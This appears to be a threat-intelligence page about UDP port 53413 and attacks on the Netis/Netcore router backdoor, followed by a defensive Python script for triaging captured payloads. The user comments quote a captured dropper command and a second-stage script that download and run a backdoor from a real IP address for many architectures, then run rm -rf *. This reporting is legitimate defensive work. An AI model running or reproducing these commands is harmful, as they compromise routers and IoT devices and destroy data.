Port Information
Protocol Service Name
tcp --- ---
Port diary mentions
URL
Surge in Exploit Attempts for Netis Router Backdoor (UDP53413)
User Comments
Submitted By Date
Comment
2024-07-22 12:13:35
This busybox command was sent to the UDP socket:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/8UsA.sh; curl -O http://5.59.248.206/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 5.59.248.206 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 5.59.248.206; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.59.248.206 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *

The 8UsA.sh file tries to load and execute a backdoor for 10 different architectures:

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.x86; curl -O http://5.59.248.206/IGz.x86;cat IGz.x86 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mips; curl -O http://5.59.248.206/IGz.mips;cat IGz.mips >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mpsl; curl -O http://5.59.248.206/IGz.mpsl;cat IGz.mpsl >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm; curl -O http://5.59.248.206/IGz.arm;cat IGz.arm >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm5; curl -O http://5.59.248.206/IGz.arm5;cat IGz.arm5 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm6; curl -O http://5.59.248.206/IGz.arm6;cat IGz.arm6 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm7; curl -O http://5.59.248.206/IGz.arm7;cat IGz.arm7 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.ppc; curl -O http://5.59.248.206/IGz.ppc;cat IGz.ppc >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.m68k; curl -O http://5.59.248.206/IGz.m68k;cat IGz.m68k >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.sh4; curl -O http://5.59.248.206/IGz.sh4;cat IGz.sh4 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
2016-08-01 00:23:46
The devices causing this traffic seem to be IoT devices (DVRs, IPCAMs, etc.), possibly part of LizardStresser or another botnet based on it.
2016-02-03 10:29:11
This appears to be an attack against Netcore routers - UDP port 53413. It attempts to run various busybox / shell commands.
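For triaging payloads like those described in the comments above, here is an added example (not part of the original page or its comments) that summarises a captured UDP 53413 payload: which fetch tools it tries, which hosts it contacts, and whether it executes what it downloaded. The `triage` function, the sample payload and the dropper heuristic are assumptions made for illustration.

```python
import re
import shlex

FETCHERS = {"wget", "curl", "tftp", "ftpget"}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample modeled on the command shape quoted in the comment;
# 192.0.2.10 (TEST-NET-1) and the file names are placeholders, not observed values.
SAMPLE = (
    "cd /tmp || cd /var/run || cd /; wget http://192.0.2.10/x.sh; "
    "curl -O http://192.0.2.10/x.sh; chmod 777 x.sh; sh x.sh; "
    "tftp -r tx.sh -g 192.0.2.10; chmod 777 tx.sh; sh tx.sh; "
    "rm -rf x.sh tx.sh; rm -rf *"
)

def triage(payload):
    """Summarise a captured payload: fetch tools, hosts, fetched and executed files."""
    fetchers, hosts, fetched, executed = set(), set(), set(), set()
    cleanup = False
    for raw in payload.split(";"):
        try:
            argv = shlex.split(raw)
        except ValueError:  # unbalanced quotes in hostile input
            argv = raw.split()
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if cmd in FETCHERS:
            fetchers.add(cmd)
            hosts.update(IPV4.findall(raw))
            # The last argument that is neither an option nor a bare IP names the file.
            names = [a for a in args if not a.startswith("-") and not IPV4.fullmatch(a)]
            if names:
                fetched.add(names[-1].rsplit("/", 1)[-1])
        elif cmd in ("sh", "bash") and args:
            executed.add(args[0])
        elif cmd.startswith("./"):
            executed.add(cmd[2:])
        elif cmd == "rm" and any(a.startswith("-") and "r" in a for a in args):
            cleanup = True
    return {
        "fetchers": sorted(fetchers),
        "hosts": sorted(hosts),
        "executed_downloads": sorted(fetched & executed),
        "cleanup": cleanup,
        # Heuristic (assumption): several fetch tools plus execution of a fetched file.
        "dropper": len(fetchers) >= 2 and bool(fetched & executed),
    }

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The heuristic does not follow renames, so a second stage that copies a download to a new name before running it (as the quoted script does with `cat ... >Coco.Telnet`) needs separate handling.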